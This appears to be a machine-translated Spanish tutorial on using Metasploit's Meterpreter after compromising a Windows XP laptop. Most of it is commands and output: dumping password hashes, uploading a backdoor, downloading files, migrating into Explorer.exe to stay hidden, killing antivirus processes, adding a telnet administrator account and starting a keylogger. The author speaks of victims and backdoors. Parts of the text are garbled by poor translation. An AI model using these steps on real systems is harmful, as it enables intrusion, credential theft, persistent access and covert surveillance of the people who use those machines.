Sei sulla pagina 1di 12

Getting Started with Meterpreter

Recientemente he tenido un montn de preguntas sobre cmo utilizar eficazmente el agente


Meterpreter contenida en el marco de Metasploit. Yo soy de ninguna manera un experto en
ello sin embargo tengo un buen conocimiento prctico de su uso. Voy a tratar introducirlos
en su uso. Si usted tiene una pregunta ms avanzada o especfica relativo a Meterpreter por
favor sintase libre de publicar en el apartado de preguntas y tratare de responder a su
pregunta.
Para empezar, aqu est la definicin de Meterpreter del pdf oficial para aquellos que no
saben lo que es:
"Meterpreter, la abreviatura de la Meta-intrprete es un advance payload
que est incluido Metasploit Framework. Su propsito es proporcionar complejo
y avanzadas caractersticas que de otro modo sera tedioso de aplicar en el montaje. La
forma en que se logra esto es por lo que permite a los desarrolladores
escribir sus propias extensiones en forma de objeto compartido (DLL) archivos que pueden
cargar y se inyectados en un proceso que se ejecuta en un equipo de destino despus de
se ha producido la explotacin. Meterpreter y todas las extensiones que se cargan se
ejecutan directamente y totalmente sobre la memoria y nunca sobre el disco, esto le permite
ejecutarse debajo del radar de deteccin de un antivirus estndar.
No voy a estar mostrando cmo explotar nada ni como entrar a los equipos. Por el bien de
este artculo, estoy asumiendo que usted ya sabe como mantener abierta su sesin de
meterpreter.
As que vamos a empezar:
1 msf exploit(handler) > exploit
2
3 [*] Starting the payload handler...
4 [*] Started reverse handler on port 8080
5 [*] Sending stage (723456 bytes)
6 [*] Meterpreter session 3 opened (192.168.2.100:8080 -> 96.28.86.186:28233)
7
8 meterpreter >

Esto es lo que parece despus de que se abri una sesin exitosa. As que vamos a hacer algunas
cosas simples. Al escribir "help" nos llevar a una lista de todos los comandos disponibles.

01 meterpreter > help


02
03 Core Commands
04 =============
05
06 Command

Description

07 -------

-----------

08 ?

Help menu

09 background
10 channel

Backgrounds the current session


Displays information about active channels

11 close

Closes a channel

12 exit

Terminate the meterpreter session

13 help

Help menu

14 interact

Interacts with a channel

15 irb
16 migrate

Drop into irb scripting mode


Migrate the server to another process

17 quit
18 read

Terminate the meterpreter session


Reads data from a channel

19 run

Executes a meterpreter script

20 use

Load a one or more meterpreter extensions

21 write

Writes data to a channel

22
23 Stdapi: File system Commands
24 ============================
25
26 Command
27 -------

Description
-----------

28 cat

Read the contents of a file to the screen

29 cd

Change directory

30 del

Delete the specified file

31 download
32 edit

Download a file or directory


Edit a file

33 getlwd

Print local working directory

34 getwd

Print working directory

35 lcd
36 lpwd

Change local working directory


Print local working directory

37 ls
38 mkdir

List files
Make directory

39 pwd

Print working directory

40 rm

Delete the specified file

41 rmdir
42 upload

Remove directory
Upload a file or directory

43
44 Stdapi: Networking Commands
45 ===========================
46
47 Command

Description

48 -------

-----------

49 ipconfig
50 portfwd

Display interfaces
Forward a local port to a remote service

51 route

View and modify the routing table

52
53 Stdapi: System Commands
54 =======================
55
56 Command

Description

57 ------58 clearev

----------Clear the event log

59 execute

Execute a command

60 getpid

Get the current process identifier

61 getuid

Get the user that the server is running as

62 kill
63 ps

Terminate a process
List running processes

64 reboot

Reboots the remote computer

65 reg

Modify and interact with the remote registry

66 rev2self

Calls RevertToSelf() on the remote machine

67 shell

Drop into a system command shell

68 shutdown

Shuts down the remote computer

69 sysinfo

Gets information about the remote system, such as OS

70
71 Stdapi: User interface Commands
72 ===============================
73
74 Command

Description

75 -------

-----------

76 enumdesktops

List all accessible desktops and window stations

77 idletime
78 keyscan_dump

Returns the number of seconds the remote user has been idle
Dump they keystroke buffer

79 keyscan_start

Start capturing keystrokes

80 keyscan_stop

Stop capturing keystrokes

81 setdesktop
82 uictl

Move to a different workstation and desktop


Control some of the user interface components

83
84 meterpreter >

Como usted puede ver que hay un montn de cosas que podemos hacer aqu. En realidad, hay
algunos comandos avanzados ms "ocultas" que podemos utilizar al escribir "use priv"
01 meterpreter > use priv
02 Loading extension priv...success.
03 meterpreter >help
04
05 Priv: Password database Commands
06 ================================
07

08 Command

Description

09 ------10 hashdump

----------Dumps the contents of the SAM database

11
12 Priv: Timestomp Commands
13 ========================
14
15 Command

Description

16 -------

-----------

17 timestomp

Manipulate file MACE attributes

18
19 meterpreter >

Ahora se dar cuenta de que tenemos algunos comandos adicionales en la parte inferior. As que
vamos a ejecutar a unos pocos y obtener un poco de informacin acerca de nuestra vctima.
1 meterpreter > getuid
2 Server username: TOSHIBA-LAPTOPmediaplayer
3 meterpreter >

Getuid nos mostrar todos los usuarios actualmente conectados.


1 meterpreter > idletime
2 User has been idle for: 24 mins 36 secs
3 meterpreter >

Idletime nos mostrar cunto tiempo ha pasado desde que el usuario ha estado activo en el
sistema
1 meterpreter > sysinfo
2 Computer: TOSHIBA-LAPTOP
3 OS
4 Arch

: Windows XP (Build 2600, Service Pack 3).


: x86

5 Language: en_US
6 meterpreter >

Sysinfo nos mostrar el nombre del ordenador, sistema operativo, arquitectura y la edicin
del lenguaje.
Ahora una de las primeras cosas que hago despus de un exploit exitoso es volcar el hash
del sistema y ponerse a trabajar grietas en ellos.
1 meterpreter > hashdump
2 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6nfe0d16ae931b73c59d7e0c089c0:::
3 ASPNET:1003:b1eb876ce14dc283594153934628466c:a1e5d931400fd77f6107a5d4050b4af0:::
4 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
5 HelpAssistant:1004:4d83c61a6e1a76b06679008f467d27d3:e7150ce0fc93dc00f610e1c0d3fb54bf:::
6 mediaplayer:1005:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c58d7e0c089c0:::

SUPPORT_388945aAdobeR:1002:aad3b435b51404eeaad3b435b51404ee:faf25868710610de776ae4158d493f
e2:::
8 meterpreter >
7

Por lo tanto, nos da el hash del sistema en un formato pwdump que muchos cracking tools
aceptaran.
En este punto podemos hacer un par de cosas. Podemos cargar un backdoor de algn tipo y
ejecutarlo para que podamos tener un punto de reentrada para una fecha posterior.
1 meterpreter > upload /root/evilbackdoor.c evilbackdoor.c
2 [*] uploading

: /root/evilbackdoor.c -> evilbackdoor.c

3 [*] uploaded
4 meterpreter >

: /root/evilbackdoor.c -> evilbackdoor.c

O podemos descargar un archivo que nos interese


1 meterpreter > download secret.txt /root/secret.txt
2 [*] downloading: secret.txt -> /root/secret.txt
3 [*] downloaded : secret.txt -> /root/secret.txt
4 meterpreter >

Una de las siguientes cosas que siempre me gusta hacer, si voy a hacer un extenso trabajo en el
interior del Meterpreter es migrar a un nuevo proceso para mantenerse oculto. Asegrese de
elegir algo que siempre est en ejecucin o es posible que se desconecte. Escriba el comando ps
para averiguar procesos en ejecucin.
001 meterpreter > ps
002
003 Process list
004 ============
005
006 PID

Name

Path

007 ---

----

----

008 316

ehtray.exe

C:WINDOWSehomeehtray.exe

009 352

igfxtray.exe

C:WINDOWSsystem32igfxtray.exe

010 364

alg.exe

C:WINDOWSSystem32alg.exe

011 452

dllhost.exe

C:WINDOWSsystem32dllhost.exe

012 464

hkcmd.exe

C:WINDOWSsystem32hkcmd.exe

013 504

ashWebSv.exe

C:Program FilesAlwil SoftwareAvast4ashWebSv.exe

014 544

mcrdsvc.exe

C:WINDOWSehomemcrdsvc.exe

015 572

iPodService.exe

C:Program FilesiPodbiniPodService.exe

016 612

igfxpers.exe

C:WINDOWSsystem32igfxpers.exe

017 656

RTHDCPL.EXE

C:WINDOWSRTHDCPL.EXE

018 672

Apoint.exe

C:Program FilesApoint2KApoint.exe

019 680

Ltmoh.exe

C:Program FilesltmohLtmoh.exe

020 688

AGRSMMSG.exe

C:WINDOWSAGRSMMSG.exe

021 704

spoolsv.exe

C:WINDOWSsystem32spoolsv.exe

022 724

TvsTray.exe

C:Program FilesToshibaTvsTvsTray.exe

023 744

CeEKey.exe

C:Program FilesTOSHIBAE-KEYCeEKey.exe

024 760

PadExe.exe

C:Program FilesTOSHIBATouch and LaunchPadExe.exe

025 764

ZoomingHook.exe

C:WINDOWSsystem32ZoomingHook.exe

026 776

SmoothView.exe

C:Program FilesTOSHIBATOSHIBA Zooming UtilitySmoothView.exe

027 784

smss.exe

SystemRootSystem32smss.exe

028 848

csrss.exe

??C:WINDOWSsystem32csrss.exe

029 876

winlogon.exe

??C:WINDOWSsystem32winlogon.exe

030 920

services.exe

C:WINDOWSsystem32services.exe

031 932

lsass.exe

C:WINDOWSsystem32lsass.exe

032 1100

svchost.exe

C:WINDOWSsystem32svchost.exe

033 1124

TPTray.exe

C:Program FilesTOSHIBATouchPadTPTray.exe

034 1132

TCtrlIOHook.exe

C:WINDOWSsystem32TCtrlIOHook.exe

035 1152

TFncKy.exe

C:Program FilesTOSHIBATOSHIBA ControlsTFncKy.exe

036 1168

svchost.exe

C:WINDOWSsystem32svchost.exe

037 1208

svchost.exe

C:WINDOWSSystem32svchost.exe

038 1232

TDispVol.exe

C:WINDOWSsystem32TDispVol.exe

039 1252

pinger.exe

C:toshibaivpismpinger.exe

040 1264

EvtEng.exe

C:Program FilesIntelWirelessBinEvtEng.exe

041 1300

S24EvMon.exe

C:Program FilesIntelWirelessBinS24EvMon.exe

042 1348

ZCfgSvc.exe

C:Program FilesIntelWirelessbinZCfgSvc.exe

043 1352

ifrmewrk.exe

C:Program FilesIntelWirelessBinifrmewrk.exe

044 1360

svchost.exe

C:WINDOWSsystem32svchost.exe

045 1384

Apntex.exe

C:Program FilesApoint2KApntex.exe

046 1408

GrooveMonitor.exe

C:Program FilesMicrosoft OfficeOffice12GrooveMonitor.exe

047 1416

HPWuSchd2.exe

C:Program FilesHPHP Software UpdateHPWuSchd2.exe

048 1436

TPSBattM.exe

C:WINDOWSsystem32TPSBattM.exe

049 1452

ashDisp.exe

C:PROGRA~1ALWILS~1Avast4ashDisp.exe

050 1472

svchost.exe

C:WINDOWSsystem32svchost.exe

051 1520

jusched.exe

C:Program FilesJavajre6binjusched.exe

052 1552

Monitor.exe

C:Program FilesLeapFrogLeapFrog ConnectMonitor.exe

053 1604

QTTask.exe

C:Program FilesQuickTimeQTTask.exe

054 1612

iTunesHelper.exe

C:Program FilesiTunesiTunesHelper.exe

055 1624

toscdspd.exe

C:Program FilesTOSHIBATOSCDSPDtoscdspd.exe

056 1636

ctfmon.exe

C:WINDOWSsystem32ctfmon.exe

057 1652

msmsgs.exe

C:Program FilesMessengermsmsgs.exe

058 1672

wwDisp.exe

C:Program FilesWebrootWasherwwDisp.exe

059 1692

aswUpdSv.exe

C:Program FilesAlwil SoftwareAvast4aswUpdSv.exe

060 1776

ashServ.exe

C:Program FilesAlwil SoftwareAvast4ashServ.exe

061 1792

wwSecure.exe

C:WINDOWSsystem32wwSecure.exe

062 1800

hpqtra08.exe

C:Program FilesHPDigital Imagingbinhpqtra08.exe

063 1864

wcescomm.exe

C:Program FilesMicrosoft ActiveSyncwcescomm.exe

064 1992

Explorer.EXE

C:WINDOWSExplorer.EXE

065 2004

rapimgr.exe

C:PROGRA~1MI3AA1~1rapimgr.exe

066 2136

svchost.exe

C:WINDOWSsystem32svchost.exe

2212 AppleMobileDeviceService.exe C:Program FilesCommon FilesAppleMobile Device


067
SupportbinAppleMobileDeviceService.exe
068 2228

mDNSResponder.exe

C:Program FilesBonjourmDNSResponder.exe

069 2264

cisvc.exe

C:WINDOWSsystem32cisvc.exe

070 2324

DVDRAMSV.exe

C:WINDOWSsystem32DVDRAMSV.exe

071 2416

ehRecvr.exe

C:WINDOWSeHomeehRecvr.exe

072 2432

Dot1XCfg.exe

C:PROGRA~1IntelWirelessBinDot1XCfg.exe

073 2488

hpobnz08.exe

C:Program FilesHPDigital Imagingbinhpobnz08.exe

074 2512

hpotdd01.exe

C:Program FilesHPDigital Imagingbinhpotdd01.exe

075 2536

RAMASST.exe

C:WINDOWSsystem32RAMASST.exe

076 2632

ehSched.exe

C:WINDOWSeHomeehSched.exe

077 2740

FlipShareService.exe

C:Program FilesFlip VideoFlipShareFlipShareService.exe

078 2868

wmiprvse.exe

C:WINDOWSsystem32wbemwmiprvse.exe

079 2884

ONENOTEM.EXE

C:Program FilesMicrosoft OfficeOffice12ONENOTEM.EXE

080 2916

svchost.exe

C:WINDOWSsystem32svchost.exe

081 2992

jqs.exe

C:Program FilesJavajre6binjqs.exe

082 3180

CommandService.exe

C:Program FilesLeapFrogLeapFrog ConnectCommandService.exe

083 3272

sqlservr.exe

c:Program FilesMicrosoft SQL ServerMSSQL.1MSSQLBinnsqlservr.exe

084 3428

iexplore.exe

C:Program FilesInternet Exploreriexplore.exe

085 3432

NMSAccessU.exe

C:Program FilesCDBurnerXPNMSAccessU.exe

086 3444

HPZipm12.exe

C:WINDOWSsystem32HPZipm12.exe

087 3468

RegSrvc.exe

C:Program FilesIntelWirelessBinRegSrvc.exe

088 3504

sqlwriter.exe

c:Program FilesMicrosoft SQL Server90Sharedsqlwriter.exe

089 3596

svchost.exe

C:WINDOWSsystem32svchost.exe

090 3692

svchost.exe

C:WINDOWSsystem32svchost.exe

091 3708

unsecapp.exe

C:WINDOWSsystem32wbemunsecapp.exe

092 3720

ashMaiSv.exe

C:Program FilesAlwil SoftwareAvast4ashMaiSv.exe

093 3780

swupdtmr.exe

c:ToshibaIVPswupdateswupdtmr.exe

094 3848

nessusd.exe

C:Program FilesTenableNessusnessusd.exe

095 4108

jucheck.exe

C:Program FilesJavajre6binjucheck.exe

096 4396

cidaemon.exe

C:WINDOWSsystem32cidaemon.exe

097 4472

cidaemon.exe

C:WINDOWSsystem32cidaemon.exe

098 5016

iexplore.exe

C:Program FilesInternet Exploreriexplore.exe

099 5448

ehmsas.exe

C:WINDOWSeHomeehmsas.exe

100
101 meterpreter >

Bueno, pues vamos a tratar de emigrar a Explorer.exe primero.


1 meterpreter > migrate 1992
2 [*] Migrating to 1992...
3 [*] Migration completed successfully.
4 meterpreter >

Excelente! As que ahora estamos ocultos. Tenga en cuenta que muchas veces el proceso de
migrar fallar y usted tendr que elegir un nuevo proceso.
Ahora bien, si usted nota en nuestra lista ps hay un AV ejecutadose. Meterpreter funciona a
un nivel que est por debajo del radar de los antivirus sin embargo es posible que tengamos
que hacer algo para acabar con AV para estar mas seguros. Meterpreter shell acepta
muchos comandos bsicos de Linux, como cd, ls, rm y por supuesto kill.
1 meterpreter > kill pid 1692
2 Killing: pid, 1692
3 [*] stdapi_sys_process_kill completed successfully.
4
5 meterpreter >

Tambin puede desactivar el teclado y el ratn y volver a habilitarlos. No he encontrado un buen


uso de esto todava pero aqu es cmo lo hace.
1 meterpreter > uictl disable keyboard
2 Disabling keyboard...
3 meterpreter > uictl disable mouse

4 Disabling mouse...
5 meterpreter > uictl enable mouse
6 Enabling mouse...
7 meterpreter > uictl enable keyboard
8 Enabling keyboard...
9 meterpreter >

Y qu si queremos ejecutar algunos comandos en el box de la vivtima del users shell? Esto se
puede hacer fcilmente con el comando shell.
1 meterpreter > shell
2 Process 1388 created.
3 Channel 1 created.
4 Microsoft Windows XP [Version 5.1.2600]
5 (C) Copyright 1985-2001 Microsoft Corp.
6
7 C:Documents and SettingsmediaplayerDesktop>

Una de las caractersticas ms robustas y emocionantes de Metasploit es la capacidad de


utilizar scripts en que la vctima desde Meterpreter shell. Metasploit esta programado en
ruby asi q ruby scripts funcionan bastante bien. Hay una serie de scripts ya incluidos en
Metasploit. Tambin es bastante fcil de escribir uno propio si usted sabe un poco de rub.
Yo no voy a ir a todos, pero aqu hay una breve lista de algunos tiles.
killav.rb (mata todos los virus contra el que se ejecutan en el sistema)
getcountermeasure.rb (mata av de fw y de / ids ')
scraper.rb (registros de un montn de informacin til a travs de una seria de comandos
automatizadas para los clientes. registros almacenados en / root/.msf3 /
gettelnet.rb (capaz de abrir un servidor de telnet en el cliente con un nombre de usuario y
contrasea)
checkvm.rb (comprueba si se trata de una mquina virtual. y nmeros de versin)
netenum.rb
search_dwld.rb
winbf.rb
credcollect.rb
hostsedit.rb
remotewinenum.rb
keylogrecorder.rb
scheduleme.rb
winenum.rb
getgui.rb
schtasksabuse.rb
wmic.rb
get_local_subnets.rb
migrate.rb

puede obtener ayuda para cualquier script ejecutando el nombre del comando seguido de -h
1 meterpreter > run scraper -h
Scraper -- harvest system info including network shares, registry hives and password
2
hashes
3 Info is stored in /root/.msf3/logs/scraper
4 USAGE: run scraper
5 meterpreter >

As que vamos a ejecutar algunos scripts para que pueda obtener uns idea de lo que pasa.
1 meterpreter > run checkvm
2 [*] Checking if target is a Virtual Machine .....
3 [*] It appears to be physical host.
4

meterpreter >

1 meterpreter > run killav


2 [*] Killing Antivirus services on the target...
3 [*] Killing off Monitor.exe...
4 meterpreter >

El gettelnet es especialmente til en Vista y Windows donde telnet no est habilitado de forma
predeterminada.
01 meterpreter > run gettelnet
02 Windows Telnet Server Enabler Meterpreter Script
03 Usage: gettelnet -u <username> -p <password>
04
05 OPTIONS:
06
07 -e
08 -h

Enable Telnet Server only.


Help menu.

09 -p <opt>

The Password of the user to add.

10 -u <opt>

The Username of the user to add.

11
12 meterpreter > run gettelnet -u root -p password
13 [*] Windows Telnet Server Enabler Meterpreter Script
14 [*] Setting Telnet Server Services service startup mode
15 [*]

The Telnet Server Services service is not set to auto, changing it to auto ...

16 [*]

Opening port in local firewall if necessary

17 [*] Setting user account for logon


18 [*]
Adding User: root with Password: password
19 [*]

Adding User: root to local group TelnetClients

20 [*]

Adding User: root to local group Administrators

21 [*] You can now login with the created user


22 meterpreter >

Y aqu est mi script favorito.

01 meterpreter > run winenum -h


02 WinEnum -- Windows local enumeration
03
04 Retrieves all kinds of information about the system
05 including environment variables, network interfaces,
06 routing, user accounts, and much more. Results are
07 stored in /root/.msf3/logs/winenum
08
09 OPTIONS:
10
11

-c
Change Access, Modified and Created times of executables that were run on the
target machine and clear the EventLog

12 -h

Help menu.

-m
Migrate the Meterpreter Session from it current process to a new cmd.exe before
13
doing anything
14 -r

Dump, compress and download entire Registry

15
16 meterpreter > run winenum
17 [*] Running Windows Local Enumerion Meterpreter Script
18 [*] New session on 96.28.86.172:39187...
[*] Saving report to /root/.msf3/logs/winenum/TOSHIBA-LAPTOP_20091221.0606-49608/TOSHIBALAPTOP_20091221.0606-49608.txt
20 [*] Checking if TOSHIBA-LAPTOP is a Virtual Machine ........
19

21 [*] BIOS Check Failed


22 [*] Running Command List ...
23 [*]
24 [*]

running command cmd.exe /c set


running command arp -a

25 [*]

running command ipconfig /all

26 [*]

running command ipconfig /displaydns

27 [*]

running command route print

28 [*]

running command net view

29 [*]
30 [*]

running command netstat -nao


running command netstat -vb

31 [*]

running command netstat -ns

32 [*]

running command net accounts

33 [*]
34 [*]

running command net session


running command net share

35 [*]

running command net group

36 [*]

running command net localgroup

37 [*]
38 [*]

running command net user


running command net localgroup administrators

39 [*]

running command net group administrators

40 [*]

running command net view /domain

41 [*]
42 [*]

running command netsh firewall show config


running command tasklist /svc

43 [*]

running command gpresult /SCOPE COMPUTER /Z

44 [*]

running command gpresult /SCOPE USER /Z

45 [*] Running WMIC Commands ....


46 [*]
running command wmic computersystem list brief
47 [*]

running command wmic useraccount list

48 [*]

running command wmic group list

49 [*]
50 [*]

running command wmic service list brief


running command wmic volume list brief

51 [*]

running command wmic logicaldisk get description,filesystem,name,size

52 [*]

running command wmic netlogin get name,lastlogon,badpasswordcount

53 [*]

running command wmic netclient list brief

54 [*]

running command wmic netuse get name,username,connectiontype,localname

55 [*]
56 [*]

running command wmic share get name,path


running command wmic process list brief

57 [*]

running command wmic startup list full

58 [*]

running command wmic rdtoggle list

59 [*]
60 [*]

running command wmic product get name,version


running command wmic qfe

61 [*]

Reading all output of WMIC commands...

62 [*]

Cleanning left over files...

63 [*] Extracting software list from registry


64 [*] Dumping and Downloading the Registry entries for Configured Wireless Networks
65 [*]

Exporting HKLMSoftwareMicrosoftWZCSVCParametersInterfaces

66 [*]

Compressing key into cab file for faster download

[*]
Downloading wlan_20091221.0606-49608.cab to -> /root/.msf3/logs/winenum/TOSHIBA67
LAPTOP_20091221.0606-49608/wlan_20091221.0606-49608.cab
68 [*]

Deleting left over files

69 [*] Dumping password hashes...


70 [*] Hashes Dumped
71 [*] Getting Tokens...
72 [*] All tokens have been processed
73 [*] Done!
74 meterpreter >

El archivo log se guardan el directorio ~ / .msf3/logs/winenum / de cualquier usuario que


ejecuto Metasploit. Como se puede ver este script automatiza rpidamente una serie de
tareas redundantes que un pentester tien q realizar en su objetivo. Esto nos puede ahorrar un
montn de tiempo si estamos atacando las redes con cientos de servidores.
El ltimo script que les mostrare keylogger. Ningun backdoor esta completa sin una.
1 meterpreter > run keylogrecorder
2 [*]

explorer.exe Process found, migrating into 2464

3 [*] Migration Successful!!


4 [*] Starting the keystroke sniffer...
5

[*] Keystrokes being saved in to


/root/.msf3/logs/keylogrecorder/96.28.86.172_20091221.2422/96.28.86.172_20091221.2422.db

6 [*] Recording ...

Los trazos se guardan en una base de datos en la mquina atacante para su consulta en el
futuro.
Eso es todo por lo que voy a explicar.
Algunos blogs utiles y sitios web con temas ms avanzados en Meterpreter:

http://www.darkoperator.com/meterpreter/
http://laramies.blogspot.com/2009/04/meterpreter-post-exploitation-recap.html
http://carnal0wnage.attackresearch.com/
http://hkashfi.blogspot.com/2008/04/bypassing-firewalls-with-port.html

Potrebbero piacerti anche